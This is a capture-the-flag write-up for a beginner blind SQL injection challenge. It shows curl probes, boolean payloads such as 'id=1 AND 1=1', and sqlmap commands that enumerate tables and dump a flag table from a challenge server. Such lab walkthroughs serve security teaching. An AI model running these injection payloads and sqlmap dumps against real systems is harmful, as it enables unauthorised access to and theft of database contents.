Skip to content

SECURE_CONNECTION//PRESS[CTRL+J]FOR ROOT ACCESS

BACK TO INTEL
WebMedium

No Sight Required

CTF writeup for No Sight Required from Backdoor

//No Sight Required

>Challenge Overview

  • Category: Web (Blind SQLi)
  • Difficulty: Beginner
  • Author: dr4g0n
  • Remote Target: http://104.198.24.52:6013/
  • Goal: Retrieve flag{...} from the minimalistic "User Directory" service that only answers yes/no style queries.

The tagline "No Sight Required" hinted that the service intentionally suppresses verbose output, nudging us toward blind SQL injection.

>1. Reconnaissance

  1. Initial page fetch
bash

curl -i [http://104.198.24.52:6013/](http://104.198.24.52:6013/)

Response: a simple HTML form that submits GET /search?id=<value> and prints either User found!, No user found, or Invalid input.

  1. Baseline behavior
bash

curl -s "[http://104.198.24.52:6013/search?id=1](http://104.198.24.52:6013/search?id=1)"

curl -s "[http://104.198.24.52:6013/search?id=999](http://104.198.24.52:6013/search?id=999)"
  • id=1User found!
  • id=999No user found with that ID
  1. Input filtering probes
  • Alphabetic keywords (UNION, select) returned Invalid input → input validator blocks letters.
  • Purely numeric expressions with operators (e.g., 1/0, 1*2, (1), 4/2, 1=1) were accepted, and the service evaluated them. This strongly suggested the server directly interpolated user input into a SQL query without sanitization, but only after ensuring the payload stayed "math-like".

These observations pointed to a numeric-only blind SQL injection surface.

>2. Confirming SQL Injection

To move beyond guesswork, I installed sqlmap (not pre-installed on the VM):

bash

sudo apt-get update

sudo apt-get install -y sqlmap

Then I pointed sqlmap at the vulnerable parameter:

bash

sqlmap -u "<http://104.198.24.52:6013/search?id=1>" --batch --level=1 --risk=1

Key findings from sqlmap:

  • Parameter id is injectable via boolean-based blind and time-based blind techniques.
  • Backend DBMS: SQLite.
  • Sqlmap automatically detected a working payload (id=1 AND 2891=2891) that preserved the "User found!" response, proving boolean-based injection.

For additional manual confirmation, I replayed sqlmap's boolean payload:

bash

curl -s "<http://104.198.24.52:6013/search?id=1%20AND%201=1>"   # User found!

curl -s "<http://104.198.24.52:6013/search?id=1%20AND%201=0>"   # No user found

The output flipped exactly as expected.

>3. Enumerating the Database

With confirmed SQLi, I used sqlmap to enumerate schema objects:

bash

sqlmap -u "<http://104.198.24.52:6013/search?id=1>" --tables --batch

Sqlmap reported two tables:

users secret_flags

secret_flags was clearly the target.

>4. Dumping the Flag Table

Finally, I dumped the sensitive table:

bash

sqlmap -u "<http://104.198.24.52:6013/search?id=1>" \\

       -D SQLite_masterdb -T secret_flags --dump --batch

Despite a few timeout retries (expected with blind/time-based techniques), sqlmap successfully extracted the row:

+----+--------------------------------------+ | id | flag                                 | +----+--------------------------------------+ | 1  | flag{bl1nd_but_n0t_l0st_1n_th3_d4rk} | +----+--------------------------------------+

>5. Final Flag

flag{bl1nd_but_n0t_l0st_1n_th3_d4rk}